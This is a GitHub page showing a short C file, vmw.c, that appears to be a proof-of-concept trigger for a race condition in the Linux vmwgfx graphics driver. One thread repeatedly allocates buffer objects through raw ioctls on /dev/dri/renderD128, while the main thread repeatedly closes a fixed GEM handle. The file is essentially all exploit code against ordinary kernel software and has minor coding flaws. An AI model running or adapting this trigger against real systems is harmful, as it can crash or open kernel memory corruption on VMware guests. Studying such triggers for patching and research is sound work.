-
Notifications
You must be signed in to change notification settings - Fork 1
/
vmw.c
98 lines (83 loc) · 1.84 KB
/
vmw.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#define _GNU_SOURCE
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <drm/drm.h>
int dri_fd =-1;
__u32 handle = -1;
struct drm_vmw_alloc_bo_req {
__u32 size;
__u32 pad64;
};
struct drm_vmw_bo_rep {
__u64 map_handle;
__u32 handle;
__u32 cur_gmr_id;
__u32 cur_gmr_offset;
__u32 pad64;
};
union drm_vmw_alloc_bo_arg {
struct drm_vmw_alloc_bo_req req;
struct drm_vmw_bo_rep rep;
};
struct drm_vmw_unref_dmabuf_arg {
__u32 handle;
__u32 pad64;
};
void trigger(void)
{
int ret;
union drm_vmw_alloc_bo_arg arg={0};
arg.req.size=0x100;
while(1) {
memset(&arg, 0, sizeof(arg));
arg.req.size=0x100;
ret=ioctl(dri_fd, 0xC0186441, &arg);
if (ret != 0 ){
printf("[*] Failed\n");
exit(-1);
}
printf("[*] created, Handle %u\n", arg.rep.handle);
usleep(100);
}
}
void gem_close(){
struct drm_gem_close arg = {0};
arg.handle = 10;
while(1){
// int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &arg);
int ret = ioctl(dri_fd, 0x40086442, &arg);
// printf("[*] DRM_VMW_UNREF_DMABUF, Handle %u, ret %d\n", arg.handle, ret);
// sleep(1);
}
}
int main(void)
{
dri_fd= open("/dev/dri/renderD128", O_RDWR);
if(dri_fd == -1)
return;
pthread_t tid1,tid2;
if(pthread_create(&tid1,NULL,trigger,NULL)){
perror("[*] thread_create tid1\n");
}
gem_close();
return 0;
}